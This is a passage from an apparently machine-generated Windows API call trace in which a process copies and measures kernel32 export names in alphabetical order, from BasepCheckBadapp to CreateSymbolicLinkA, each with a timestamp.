lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.142] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.142] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.142] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.142] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.142] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.142] lstrlenA (lpString="BEEP") returned 4 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.142] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.142] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.142] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.142] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.142] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.142] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.142] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.142] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.142] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.143] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.143] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.143] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.143] lstrlenA (lpString="CANCELIO") returned 8 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.143] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.143] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.143] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.143] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.143] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.143] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.143] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.143] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.143] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.143] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.143] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.143] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.143] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.143] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.143] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.143] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.144] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.144] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.144] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.144] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.144] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.144] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.144] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.144] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.144] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.144] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.144] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.144] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.144] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.144] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.145] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.145] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.145] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.145] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.145] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.145] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.145] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.145] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.145] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.145] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.145] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.145] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.145] lstrlenA (lpString="COPYFILEA") returned 9 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.145] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.145] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.145] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.145] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.145] lstrlenA (lpString="COPYFILEW") returned 9 [0082.145] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.145] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.146] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.146] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.146] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.146] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.146] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.146] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.146] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.146] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.146] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.146] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.146] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.146] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.146] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.146] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.146] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.147] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.147] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.147] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.147] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.147] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.147] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.147] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.147] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.147] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.147] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.147] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.147] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.147] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.147] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.147] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.147] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.147] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.147] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.147] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.148] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.148] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.148] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.148] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.148] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.148] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.148] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.148] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.148] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.148] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.148] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.148] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.148] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.148] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.148] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.148] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.148] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.148] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.148] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.148] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.149] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.149] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.149] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.149] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.149] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.149] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.149] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: 